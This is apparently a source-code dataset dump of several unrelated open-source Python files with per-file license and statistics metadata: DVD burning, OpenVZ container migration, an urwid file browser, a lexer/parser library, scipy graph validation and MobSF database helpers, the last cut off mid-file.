set in `kuma.settings.pytest` url = reverse("api.v1.plus.landing_page_variant") response = client.get(url) assert response.status_code == 200 first_time = response.json() assert first_time["variant"] > 0 assert first_time["variant"] <= len(settings.PLUS_VARIANTS) assert first_time["price"] in settings.PLUS_VARIANTS # It should stick no matter how many times you run it for _ in range(10): response = client.get(url) assert response.status_code == 200 assert response.json()["variant"] == first_time["variant"] assert response.json()["price"] == first_time["price"]
mpl-2.0
8,353,484,530,019,229,000
33.387097
80
0.673546
false
atvcaptain/enigma2
lib/python/Plugins/Extensions/DVDBurn/Title.py
1
6455
from __future__ import absolute_import from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection from . import TitleCutter class ConfigFixedText(ConfigText): def __init__(self, text, visible_width=60): ConfigText.__init__(self, default = text, fixed_size = True, visible_width = visible_width) def handleKey(self, key): pass class Title: def __init__(self, project): self.properties = ConfigSubsection() self.properties.menutitle = ConfigText(fixed_size = False, visible_width = 80) self.properties.menusubtitle = ConfigText(fixed_size = False, visible_width = 80) self.properties.aspect = ConfigSelection(choices = [("4:3", _("4:3")), ("16:9", _("16:9"))]) self.properties.widescreen = ConfigSelection(choices = [("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")]) self.properties.autochapter = ConfigInteger(default = 0, limits = (0, 60)) self.properties.audiotracks = ConfigSubList() self.DVBname = _("Title") self.DVBdescr = _("Description") self.DVBchannel = _("Channel") self.cuesheet = [ ] self.source = None self.filesize = 0 self.estimatedDiskspace = 0 self.inputfile = "" self.cutlist = [ ] self.chaptermarks = [ ] self.timeCreate = None self.project = project self.length = 0 self.VideoType = -1 self.VideoPID = -1 self.framerate = 0 self.progressive = -1 self.resolution = (-1, -1) def addService(self, service): from os import path from enigma import eServiceCenter, iServiceInformation from ServiceReference import ServiceReference from time import localtime, time self.source = service serviceHandler = eServiceCenter.getInstance() info = serviceHandler.info(service) sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or "" self.DVBdescr = sDescr sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate) if sTimeCreate > 1: self.timeCreate = localtime(sTimeCreate) serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref)) name = info and info.getName(service) or "Title" + sDescr self.DVBname = name self.DVBchannel = serviceref.getServiceName() self.inputfile = service.getPath() self.filesize = path.getsize(self.inputfile) self.estimatedDiskspace = self.filesize self.length = info.getLength(service) def addFile(self, filename): from enigma import eServiceReference ref = eServiceReference(1, 0, filename) self.addService(ref) self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self) def titleEditDone(self, cutlist): self.initDVDmenuText(len(self.project.titles)) self.cuesheet = cutlist self.produceFinalCuesheet() def initDVDmenuText(self, track): s = self.project.menutemplate.settings self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track)) self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track)) def formatDVDmenuText(self, template, track): template = template.replace("$i", str(track)) template = template.replace("$t", self.DVBname) template = template.replace("$d", self.DVBdescr) template = template.replace("$c", str(len(self.chaptermarks)+1)) template = template.replace("$f", self.inputfile) template = template.replace("$C", self.DVBchannel) #if template.find("$A") >= 0: audiolist = [ ] for audiotrack in self.properties.audiotracks: active = audiotrack.active.getValue() if active: trackstring = audiotrack.format.getValue() trackstring += ' (' + audiotrack.language.getValue() + ')' audiolist.append(trackstring) audiostring = ', '.join(audiolist) template = template.replace("$A", audiostring) if template.find("$l") >= 0: l = self.length lengthstring = "%d:%02d:%02d" % (l/3600, l%3600/60, l%60) template = template.replace("$l", lengthstring) if self.timeCreate: template = template.replace("$Y", str(self.timeCreate[0])) template = template.replace("$M", str(self.timeCreate[1])) template = template.replace("$D", str(self.timeCreate[2])) timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4]) template = template.replace("$T", timestring) else: template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "") return template def produceFinalCuesheet(self): CUT_TYPE_IN = 0 CUT_TYPE_OUT = 1 CUT_TYPE_MARK = 2 CUT_TYPE_LAST = 3 accumulated_in = 0 accumulated_at = 0 last_in = 0 self.cutlist = [ ] self.chaptermarks = [ ] # our demuxer expects *strictly* IN,OUT lists. currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet) if currently_in: self.cutlist.append(0) # emulate "in" at first for (pts, type) in self.cuesheet: #print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in if type == CUT_TYPE_IN and not currently_in: self.cutlist.append(pts) last_in = pts currently_in = True if type == CUT_TYPE_OUT and currently_in: self.cutlist.append(pts) # accumulate the segment accumulated_in += pts - last_in accumulated_at = pts currently_in = False if type == CUT_TYPE_MARK and currently_in: # relocate chaptermark against "in" time. This is not 100% accurate, # as the in/out points are not. reloc_pts = pts - last_in + accumulated_in self.chaptermarks.append(reloc_pts) if len(self.cutlist) > 1: part = accumulated_in / (self.length*90000.0) usedsize = int ( part * self.filesize ) self.estimatedDiskspace = usedsize self.length = accumulated_in / 90000 def getChapterMarks(self, template="$h:$m:$s.$t"): timestamps = [ ] chapters = [ ] minutes = self.properties.autochapter.getValue() if len(self.chaptermarks) < 1 and minutes > 0: chapterpts = 0 while chapterpts < (self.length-60*minutes)*90000: chapterpts += 90000 * 60 * minutes chapters.append(chapterpts) else: chapters = self.chaptermarks for p in chapters: timestring = template.replace("$h", str(p / (90000 * 3600))) timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60)))) timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000))) timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90))) timestamps.append(timestring) return timestamps
gpl-2.0
1,176,808,851,013,645,800
36.52907
127
0.696514
false
vponomaryov/manila
manila/share/drivers/dell_emc/plugins/vmax/constants.py
1
1753
# Copyright (c) 2016 Dell Inc. or its subsidiaries. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. STATUS_OK = 'ok' STATUS_INFO = 'info' STATUS_DEBUG = 'debug' STATUS_WARNING = 'warning' STATUS_ERROR = 'error' STATUS_NOT_FOUND = 'not_found' MSG_GENERAL_ERROR = '13690601492' MSG_INVALID_VDM_ID = '14227341325' MSG_INVALID_MOVER_ID = '14227341323' MSG_FILESYSTEM_NOT_FOUND = "18522112101" MSG_FILESYSTEM_EXIST = '13691191325' MSG_VDM_EXIST = '13421840550' MSG_SNAP_EXIST = '13690535947' MSG_INTERFACE_NAME_EXIST = '13421840550' MSG_INTERFACE_EXIST = '13691781136' MSG_INTERFACE_INVALID_VLAN_ID = '13421850371' MSG_INTERFACE_NON_EXISTENT = '13691781134' MSG_JOIN_DOMAIN = '13157007726' MSG_UNJOIN_DOMAIN = '13157007723' # Necessary to retry when VMAX database is locked for provisioning operation MSG_CODE_RETRY = '13421840537' IP_ALLOCATIONS = 2 CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'} XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>' XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api' CIFS_ACL_FULLCONTROL = 'fullcontrol' CIFS_ACL_READ = 'read' SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
apache-2.0
1,427,866,968,296,748,000
30.872727
78
0.731888
false
avagin/p.haul
p_haul_ovz.py
1
4646
# # OpenVZ containers hauler module # import os import shutil import p_haul_cgroup import p_haul_netifapi as netif import p_haul_fsapi as fsapi import p_haul_netapi as netapi import fs_haul_shared import fs_haul_subtree name = "ovz" vzpid_dir = "/var/lib/vzctl/vepid/" vz_dir = "/vz" vzpriv_dir = "%s/private" % vz_dir vzroot_dir = "%s/root" % vz_dir vz_conf_dir = "/etc/vz/conf/" vz_pidfiles = "/var/lib/vzctl/vepid/" cg_image_name = "ovzcg.img" class p_haul_type: def __init__(self, id): self._ctid = id # # This list would contain (v_in, v_out, v_br) tuples where # v_in is the name of veth device in CT # v_out is its peer on the host # v_bridge is the bridge to which thie veth is attached # self._veths = [] self._cfg = [] def __load_ct_config(self, dir): print "Loading config file from %s" % dir ifd = open(os.path.join(dir, self.__ct_config())) for line in ifd: self._cfg.append(line) if line.startswith("NETIF="): # # Parse and keep veth pairs, later we will # equip restore request with this data and # will use it while (un)locking the network # v_in = None v_out = None v_bridge = None vs = line.strip().split("=", 1)[1].strip("\"") for parm in vs.split(","): pa = parm.split("=") if pa[0] == "ifname": v_in = pa[1] elif pa[0] == "host_ifname": v_out = pa[1] elif pa[0] == "bridge": v_bridge = pa[1] if v_in and v_out: print "\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge) veth = netapi.net_dev() veth.name = v_in veth.pair = v_out veth.link = v_bridge self._veths.append(veth) ifd.close() def __apply_cg_config(self): print "Applying CT configs" # FIXME -- implement pass def id(self): return (name, self._ctid) def init_src(self): self._fs_mounted = True self._bridged = True self.__load_ct_config(vz_conf_dir) def init_dst(self): self._fs_mounted = False self._bridged = False def root_task_pid(self): pf = open(os.path.join(vzpid_dir, self._ctid)) pid = pf.read() return int(pid) def __ct_priv(self): return "%s/%s" % (vzpriv_dir, self._ctid) def __ct_root(self): return "%s/%s" % (vzroot_dir, self._ctid) def __ct_config(self): return "%s.conf" % self._ctid # # Meta-images for OVZ -- container config and info about CGroups # def get_meta_images(self, dir): cg_img = os.path.join(dir, cg_image_name) p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img) cfg_name = self.__ct_config() return [ (os.path.join(vz_conf_dir, cfg_name), cfg_name), \ (cg_img, cg_image_name) ] def put_meta_images(self, dir): print "Putting config file into %s" % vz_conf_dir self.__load_ct_config(dir) ofd = open(os.path.join(vz_conf_dir, self.__ct_config()), "w") ofd.writelines(self._cfg) ofd.close() # Keep this name, we'll need one in prepare_ct() self.cg_img = os.path.join(dir, cg_image_name) # # Create cgroup hierarchy and put root task into it # Hierarchy is unlimited, we will apply config limitations # in ->restored->__apply_cg_config later # def prepare_ct(self, pid): p_haul_cgroup.restore_hier(pid, self.cg_img) def __umount_root(self): print "Umounting CT root" os.system("umount %s" % self.__ct_root()) self._fs_mounted = False def mount(self): nroot = self.__ct_root() print "Mounting CT root to %s" % nroot if not os.access(nroot, os.F_OK): os.makedirs(nroot) os.system("mount --bind %s %s" % (self.__ct_priv(), nroot)) self._fs_mounted = True return nroot def umount(self): if self._fs_mounted: self.__umount_root() def get_fs(self): rootfs = fsapi.path_to_fs(self.__ct_priv()) if not rootfs: print "CT is on unknown FS" return None print "CT is on %s" % rootfs if rootfs == "nfs": return fs_haul_shared.p_haul_fs() if rootfs == "ext3" or rootfs == "ext4": return fs_haul_subtree.p_haul_fs(self.__ct_priv()) print "Unknown CT FS" return None def restored(self, pid): print "Writing pidfile" pidfile = open(os.path.join(vz_pidfiles, self._ctid), 'w') pidfile.write("%d" % pid) pidfile.close() self.__apply_cg_config() def net_lock(self): for veth in self._veths: netif.ifdown(veth[1]) def net_unlock(self): for veth in self._veths: netif.ifup(veth[1]) if veth[2] and not self._bridged: netif.bridge_add(veth[1], veth[2]) def can_migrate_tcp(self): return True def veths(self): # # Caller wants to see list of tuples with [0] being name # in CT and [1] being name on host. Just return existing # tuples, the [2] with bridge name wouldn't hurt # return self._veths
lgpl-2.1
7,124,431,274,139,254,000
23.197917
67
0.63022
false
jima80525/pyres
pyres/filemanager.py
1
4287
""" manages the files on the mp3 player """ import os import re import logging import shutil import pyres.utils as utils def _double_digit_name(name): """ Makes all numbers two digit numbers by adding a leading 0 where necessary. Three digit or longer numbers are unaffected. """ # do a little clean up to start with name = name.rstrip().replace('\\', '/') name = name.rstrip('/') # make sure we don't have trailing / chars # now pull of the trailing '3' on .mp3 filenames so we don't convert that mp3suffix = '' if name.endswith('mp3'): name = name[:-1] mp3suffix = '3' # the regex produces a empty string at the end, skip that or zfill will # expand it to 00. Note we cannot just remove the last element from the # split as it does not always produce an empty element. Joy elements = re.split(r'(\d+)', name) if elements[-1] == '': elements.pop() result = "" # this next section is a bit goofy. We need to tell whether a given # element is a number (\d+) or not. Only if it's a number do we want to do # the zfill on it. Else a name like '1b1a1z.1mp3' ends up adding a zero to # the b a and z elements as well as the 1s. (in other words that string # ends up with '010b010a010z.01mp3' instead of '01b01a01z.01mp3') # It might be possible to be clever about the regex grouping on the split, # but that idea is escaping me presently. for element in elements: try: int(element) except ValueError: result += element else: result += element.zfill(2) result += mp3suffix return re.sub(' +', ' ', result) # remove double spaces class FileManager(object): """ Class to manage filesystem on mp3 player """ def __init__(self, base_dir): # set default value for mp3 player # base_dir = base_dir or "TestFiles" base_dir = base_dir or "/media/jima/3C33-7AC4/" self.base_dir = base_dir utils.mkdir_p(self.base_dir) def does_filesystem_exist(self): """ Tests for existence - this is unused in real code, but it's handy for unit tests. It was originally added to keep lint happy. """ return os.path.exists(self.base_dir) def copy_audiobook(self, source_dir, dest_dir=None): """ Main routine to convert and copy files to mp3 player """ if not dest_dir: dest_dir = source_dir print("Copying audiobook from %s" % source_dir) else: print("Coping audiobook from %s to %s" % (source_dir, dest_dir)) for root, dirs, files in os.walk(source_dir): dirs.sort() for dir_name in dirs: full_dir = os.path.join(root, _double_digit_name(dir_name)) utils.mkdir_p(os.path.join(self.base_dir, full_dir)) for filename in sorted(files): file_name = os.path.join(root, filename) newfile = _double_digit_name(os.path.join(self.base_dir, dest_dir, file_name)) logging.debug("copying %s to %s", file_name, newfile) print("copying to %s" % (newfile)) shutil.copyfile(file_name, newfile) def copy_episodes_to_player(self, episodes): """ Copies the episodes to the mp3 player """ # make sure the podcast directory exists podcast_dir = os.path.join(self.base_dir, "podcasts_" + utils.current_date_time_as_string()) utils.mkdir_p(podcast_dir) total = len(episodes) counter = 0 for episode in sorted(episodes, key=lambda x: x.date): episode.file_name = episode.file_name.replace('\\', '/') (_, tail) = os.path.split(episode.file_name) newfile = os.path.join(podcast_dir, tail) logging.debug("copying %s to %s", episode.file_name, newfile) shutil.copyfile(episode.file_name, newfile) counter += 1 logging.debug("copied %s to %s", episode.file_name, newfile) print("%2d/%d: copied %s to %s" % (counter, total, episode.file_name, newfile))
mit
-3,073,739,497,052,079,000
40.621359
79
0.586191
false
bmars/sisko
sisko/app.py
1
4908
# Copyright (C) 2014 Brian Marshall # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from operator import attrgetter from gi.repository import Gio import urwid from sisko.widgets import Dialog, OverlayStack, PathBar, FileItem # Vim-like cursor movement. urwid.command_map['k'] = 'cursor up' urwid.command_map['j'] = 'cursor down' urwid.command_map['h'] = 'cursor left' urwid.command_map['l'] = 'cursor right' class Application: """ Main application class. """ _PALETTE = [('dialog', 'black', 'light gray'), ('focused', 'white', 'dark blue'), ('folder', 'bold', ''), ('folder focused', 'white, bold', 'dark blue'), ('footer', 'light gray', 'dark gray'), ('footer key', 'white, bold', 'black'), ('path-bar', 'white', 'black'), ('path-bar current', 'white, bold', 'dark gray')] _FOOTER = [('footer key', " Alt+H "), " ", _("Hidden Files"), " ", ('footer key', " Q "), " ", _("Quit")] def __init__(self): self._path_bar = PathBar() self._files = urwid.SimpleFocusListWalker([]) self._toplevel = OverlayStack(urwid.Frame( urwid.ListBox(self._files), header=self._path_bar, footer=urwid.AttrMap(urwid.Text(self._FOOTER), 'footer'))) self._show_hidden = False def run(self, folder: Gio.File): """ Run the application, opening the given folder. """ self._open(folder) main = urwid.MainLoop(self._toplevel, self._PALETTE, unhandled_input=self._unhandled_input) main.screen.set_terminal_properties(bright_is_bold=False) main.run() def _open(self, folder: Gio.File): """ Open a folder. """ children = folder.enumerate_children( ','.join([Gio.FILE_ATTRIBUTE_STANDARD_IS_HIDDEN, Gio.FILE_ATTRIBUTE_STANDARD_IS_BACKUP, Gio.FILE_ATTRIBUTE_STANDARD_NAME, FileItem.FILE_ATTRIBUTES]), Gio.FileQueryInfoFlags.NONE, None) self._path_bar.location = folder del self._files[:] for info in children: if self._show_hidden or not (info.get_is_hidden() or info.get_is_backup()): self._files.append(FileItem(folder.get_child(info.get_name()), info)) list.sort(self._files, key=attrgetter('name_key')) def _open_focused(self): """ Open the focused folder. """ focus = self._files.get_focus()[0] if (focus is not None and focus.info.get_file_type() == Gio.FileType.DIRECTORY): self._open(focus.file) def _trash_focused(self): """ Move the focused file to the Trash. """ focus = self._files.get_focus()[0] if focus is None: return dialog = Dialog( _("Are you sure you want to move \"{}\" to the Trash?").format( focus.info.get_display_name()), [(_("Cancel"), 'cancel'), (_("Move to Trash"), 'trash')]) def on_response(response_id): if response_id == 'trash': focus.file.trash(None) del self._files[self._files.index(focus)] self._toplevel.show_dialog(dialog, on_response) def _unhandled_input(self, key): """ Handle application key commands. """ if urwid.command_map[key] == 'cursor left': # Open previous folder in the path. if self._path_bar.previous is not None: self._open(self._path_bar.previous) elif urwid.command_map[key] == 'cursor right': # Open next folder in the path. if self._path_bar.next is not None: self._open(self._path_bar.next) elif urwid.command_map[key] == 'activate': self._open_focused() elif key == 'delete': self._trash_focused() elif key == 'meta h': self._show_hidden = not self._show_hidden self._open(self._path_bar.location) elif key in ('Q', 'q'): raise urwid.ExitMainLoop
gpl-3.0
5,710,978,842,891,577,000
36.753846
78
0.556031
false
loehnertj/bsbgateway
bsbgateway/util/jos_parser.py
1
15340
############################################################################## # # Copyright (C) Johannes Loehnert, 2013-2015 # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import re __all__ = [ "Token", "AstNode", "ParserContext", "StackTrace", "seq", "multiple", "optional", "anyof", "generate_lexer", "re", "generate_parser", ] class Token(object): ntype=0 content=None srcoffset = 0 def __init__(o, ntype, content=None, srcoffset=0): o.ntype = ntype o.content = content o.srcoffset = srcoffset def __unicode__(o): if not o.content: return o.ntype content = o.content if not isinstance(content, unicode): content = unicode(content) if len(content)> 40: content = content[:37] + u"..." return unicode(o.ntype) + u"<" + content.replace("\n", "\n ") + u">" def __str__(o): if not o.content: return o.ntype content = o.content if not isinstance(content, str): content = str(content) # may throw encode error!!! if len(content)> 40: content = content[:37] + "..." return o.ntype + "<" + content.replace("\n", "\n ") + ">" __repr__ = __str__ def __call__(o): return o.content class AstNode: """represents a node of the abstract syntax tree sequence is a list of the children. Its items can be Tokens and AstNodes, mixing is allowed. Take care: a single Token object is a valid tree!! The tree structure will match the given grammar. """ ntype = "" _children = None def __init__(o, ntype, children): o.ntype = ntype o._children = children def __str__(o): s = o.ntype for c in o._children: s = s + "\n" + str(c).replace("\n", "\n ") return s def __unicode__(o): s = unicode(o.ntype) for c in o._children: s = s + u"\n" + unicode(c).replace("\n", "\n ") return s def __getattr__(o, ntype): """gets the child node(s) having the given ntype. Returns list of children that matches.""" result = [] for c in o._children: if c.ntype == ntype: result.append(c) return result def __iter__(o): """iterates over the children of this node.""" return o._children.__iter__() def __call__(o): """return token content of this subtree. The subtree must contain 0 or 1 token, multiple tokens cause an Exception. Returns token.content (None if no token is there).""" result = [c() for c in o._children] result = [x for x in result if x is not None] if len(result)>1: raise ValueError("More than one token in subtree '%s'"%o.ntype) if len(result)==0: return None return result[0] def __getitem__(o, key): if isinstance(key, basestring): l = o.__getattr__(key) if len(l) > 1: raise ValueError("more than one %s child"%key) if len(l)==0: return None return l[0] else: return o._children[key] content = property(__call__) class ParserContext: def __init__(o, tokens, ruleset): o.tokens = tokens o.ruleset = ruleset.copy() o.stack_trace = None o.stack = [] def push(o, symbol): '''processor should push HIS OWN name before calling subprocessors, and .pop() afterwards.''' o.stack.append(symbol) def pop(o): o.stack.pop() def mktrace(o, symbol, errdescription="", reached_position=-1): """create a stack trace and remember it if a bigger position was reached.""" trace = StackTrace(o.stack+[symbol], errdescription, reached_position) # remember the trace if there is none remembered, if it reached longer than the last one, # or if it extends the last remembered one. if o.stack_trace is None \ or o.stack_trace.reached_position < trace.reached_position: o.stack_trace = trace return trace class StackTrace: stack = [] reached_position =-1 errdescription = "" def __init__(o, stack, errdescription="", reached_position=-1): o.stack = stack[:] o.errdescription = errdescription o.reached_position = reached_position def __str__(o): return " ".join(o.stack) + " : '" + o.errdescription + "' (@token %d"%o.reached_position + ")" def _convert(args): """reads the given list and replaces all strings with the corresponding _expect processor. """ processors = list() for processor in args: # replace strings by the '_expect' processor. if isinstance(processor, basestring): processor = _expect(processor) processors.append(processor) return processors # Processors: ========================================================== # each of those functions returns a processor for the token stream. #def process(pcontext, position): # trys to apply itself onto the tokens, if needed branches to another rule. # it starts at position (index into tokens). # Returns (partlist, new_position): # partlist := LIST of AstNodes and Tokens # StackTrace if not applicable. # new_position: where further parsing must continue def _expect(text): """Expect processor: if text is lowercase, expect something matching that rule. if text is not lowercase, expect a token with that ntype. You do not need to use it directly. All strings given as argument to another processor are directly matched. """ if text != text.lower(): # expect that particular TOKEN def process(pcontext, position): tokens = pcontext.tokens if len(tokens) > position: token = tokens[position] else: # after end of stream there comes an infinite amount of EOF tokens. token = Token("EOF", None) if token.ntype == text: return [token], position+1 else: return pcontext.mktrace("expect", errdescription="expected %s token"%text, reached_position=position), position else: # try whether the RULE applies def process(pcontext, position): pcontext.push("<%s>"%text) result, new_position = _try_rule(pcontext, position, text) pcontext.pop() if isinstance(result, StackTrace): return result, position else: return [result], new_position return process def seq(*args): """sequence processor: match the full sequence given as arguments.""" processors = _convert(args) def process(pcontext, position): result = [] start_position = position for processor in processors: subresult, position = processor(pcontext, position) if isinstance(subresult, StackTrace): # parsing failed further down. # exception here: pass Stacktrace directly! return subresult, start_position else: # append returned list to my result result += subresult #success return result, position return process def multiple(*args): """multiple processor: match the sequence given as arguments n times (n>=0). """ subseq = seq(*args) def process(pcontext, position): result = [] while True: pcontext.push("multiple") subresult, new_position = subseq(pcontext, position) pcontext.pop() if isinstance(subresult, StackTrace): # ignore trace and return what you got so far break; # detect and break endless loop if len(subresult) == 0: subresult = pcontext.mktrace("multiple", errdescription="endless loop detected", reached_position = position) break; result += subresult position = new_position return result, position return process def optional(*args): """optional processor: match the full sequence given as argument, or empty list""" subseq = seq(*args) def process(pcontext, position): pcontext.push("optional") subresult, new_position = subseq(pcontext, position) pcontext.pop() # only thing we have to do is convert StackTrace (no match) into a valid match. if isinstance(subresult, StackTrace): return [], position else: return subresult, new_position return process def anyof(*args): """anyof processor: try the given processors in turn, return the first match. for alternative sequences, wrap them in seq(...). """ processors = _convert(args) if len(processors)==0: raise ArgumentError, "at least one alternative must be given to anyof" def process(pcontext, position): for processor in processors: pcontext.push("anyof") result, new_position = processor(pcontext, position) pcontext.pop() if not isinstance(result, StackTrace): return result, new_position # nothing matched return pcontext.mktrace("anyof", "no alternative matched", position), position return process # END of processor generators! ============================ def _try_rule(pcontext, position, rulename): """ takes a list of Tokens, the ruleset, and the name of the subtree rule. Returns the AST (tree of AstNodes and/or tokens), or StackTrace if parsing failed. """ processor = pcontext.ruleset[rulename] result, new_position = processor(pcontext, position) if isinstance(result, StackTrace): return result, position else: return AstNode(rulename, result), new_position def generate_lexer(symbols, re_flags): """generates a lexer function for the given symbol set. The symbol set is a list: ["SYMBOL1", "regex1", "SYMBOL2", "regex2", (...)]. Internally, re.Scanner is used. Look up the re module docs for regexp syntax. Applied to a source string, the lexer function returns a list of Tokens, ie. Token objects. Use the empty string "" as symbol for symbols to be ignored (e.g. whitespace). No Tokens are generated for those. Mark the content of the token by a capture group in the regexp. If there is a named group "content", it is set as Token content. If not, the first capture group is set as Token content. If there are no capture groups, content will be None. Known Bug: the first regex will always have a capture group, by default the whole match. If you want a token without content, put () at the end to make the first capture group an empty string. """ # factory that returns a specific token-generator. def factory(ntype, has_value): def mktoken(regex, match): if has_value: # From the construction of the regex, the group having the # index of the named group +1 is our value. content = match.group(regex.groupindex[ntype] + 1) else: content = None t = Token(ntype, content, match.start()) return t return mktoken regexs = [] symnames = [] funcs = {} for sym, regex in zip(symbols[::2], symbols[1::2]): if sym == "": regexs.append("r(%s)"%(sym)) else: symnames.append(sym) regexs.append(r"(?P<%s>%s)"%(sym, regex)) # check if the regex defines groups i.e. delivers a value p = re.compile(regex) funcs[sym] = factory(sym, (p.groups>0)) regex = re.compile("|".join(regexs), re_flags) def lexer(text): tokens = [] lastpos = 0 for match in regex.finditer(text): # find matched symbol groups = match.groupdict() for sym in symnames: if groups[sym]: tokens.append(funcs[sym](regex, match)) break; lastpos = match.end() return tokens, text[lastpos:] return lexer def generate_parser(ruleset, entrypoint=""): """generates a parser for the given grammar (ruleset). The ruleset must be a dictionary with: string keys (rulenames), which MUST be lowercase processor or string values. values: processors are callbacks built by nesting the functions seq, multiple, optional, anyof. string values match either another rule (if lowercase) or one token (if not lowercase). In the latter case, the string value is compared against the Token.ntype. by default, the rule "" (empty string as key) is used as entrypoint. You can give another entrypoint for testing parts of the grammar. """ rules = ruleset.copy() # convert string values into _expect for key in rules.keys(): if isinstance(rules[key], basestring): rules[key] = _expect(rules[key]) def parse(tokens): """ takes a list of Tokens. Returns (tree, pcontext) - tree: the AST (tree of AstNodes and/or tokens), or None if parsing failed. NOTE that a single Token is also a valid tree. pcontext: final state of parsing contest (for error location) .stack_trace: a StackTrace object if parsing failed .stack_trace.stack: list of called operators .stack_trace.reached_position: where the parser failed to continue use it to validate if everything was read, or for error messages. """ pcontext = ParserContext(tokens, rules) result, end_position = _try_rule(pcontext, 0, "") if isinstance(result, StackTrace): result = None print pcontext.stack_trace else: pcontext.stack_trace = None return result, pcontext return parse
gpl-3.0
-6,327,910,968,418,215,000
36.93401
127
0.574185
false
beiko-lab/gengis
bin/Lib/site-packages/scipy/sparse/csgraph/_validation.py
1
2475
from __future__ import division, print_function, absolute_import import numpy as np from scipy.sparse import csr_matrix, isspmatrix, isspmatrix_csc, isspmatrix_csr from ._tools import csgraph_to_dense, csgraph_from_dense,\ csgraph_masked_from_dense, csgraph_from_masked DTYPE = np.float64 def validate_graph(csgraph, directed, dtype=DTYPE, csr_output=True, dense_output=True, copy_if_dense=False, copy_if_sparse=False, null_value_in=0, null_value_out=np.inf, infinity_null=True, nan_null=True): """Routine for validation and conversion of csgraph inputs""" if not (csr_output or dense_output): raise ValueError("Internal: dense or csr output must be true") # if undirected and csc storage, then transposing in-place # is quicker than later converting to csr. if (not directed) and isspmatrix_csc(csgraph): csgraph = csgraph.T if isspmatrix(csgraph): if csr_output: csgraph = csr_matrix(csgraph, dtype=DTYPE, copy=copy_if_sparse) else: csgraph = csgraph_to_dense(csgraph, null_value=null_value_out) elif np.ma.is_masked(csgraph): if dense_output: mask = csgraph.mask csgraph = np.array(csgraph.data, dtype=DTYPE, copy=copy_if_dense) csgraph[mask] = null_value_out else: csgraph = csgraph_from_masked(csgraph) else: if dense_output: csgraph = csgraph_masked_from_dense(csgraph, copy=copy_if_dense, null_value=null_value_in, nan_null=nan_null, infinity_null=infinity_null) mask = csgraph.mask csgraph = np.asarray(csgraph.data, dtype=DTYPE) csgraph[mask] = null_value_out else: csgraph = csgraph_from_dense(csgraph, null_value=null_value_in, infinity_null=infinity_null, nan_null=nan_null) if csgraph.ndim != 2: raise ValueError("compressed-sparse graph must be two dimensional") if csgraph.shape[0] != csgraph.shape[1]: raise ValueError("compressed-sparse graph must be shape (N, N)") return csgraph
gpl-3.0
2,765,522,862,928,460,300
40.672414
79
0.560404
false
MobSF/Mobile-Security-Framework-MobSF
mobsf/StaticAnalyzer/views/ios/db_interaction.py
1
7363
"""Module holding the functions for the db.""" import logging from django.conf import settings from mobsf.MobSF.utils import python_dict, python_list from mobsf.StaticAnalyzer.models import StaticAnalyzerIOS from mobsf.StaticAnalyzer.models import RecentScansDB logger = logging.getLogger(__name__) def get_context_from_db_entry(db_entry): """Return the context for IPA/ZIP from DB.""" try: logger.info('Analysis is already Done. Fetching data from the DB...') context = { 'version': settings.MOBSF_VER, 'title': 'Static Analysis', 'file_name': db_entry[0].FILE_NAME, 'app_name': db_entry[0].APP_NAME, 'app_type': db_entry[0].APP_TYPE, 'size': db_entry[0].SIZE, 'md5': db_entry[0].MD5, 'sha1': db_entry[0].SHA1, 'sha256': db_entry[0].SHA256, 'build': db_entry[0].BUILD, 'app_version': db_entry[0].APP_VERSION, 'sdk_name': db_entry[0].SDK_NAME, 'platform': db_entry[0].PLATFORM, 'min_os_version': db_entry[0].MIN_OS_VERSION, 'bundle_id': db_entry[0].BUNDLE_ID, 'bundle_url_types': python_list(db_entry[0].BUNDLE_URL_TYPES), 'bundle_supported_platforms': python_list(db_entry[0].BUNDLE_SUPPORTED_PLATFORMS), 'icon_found': db_entry[0].ICON_FOUND, 'info_plist': db_entry[0].INFO_PLIST, 'binary_info': python_dict(db_entry[0].BINARY_INFO), 'permissions': python_list(db_entry[0].PERMISSIONS), 'ats_analysis': 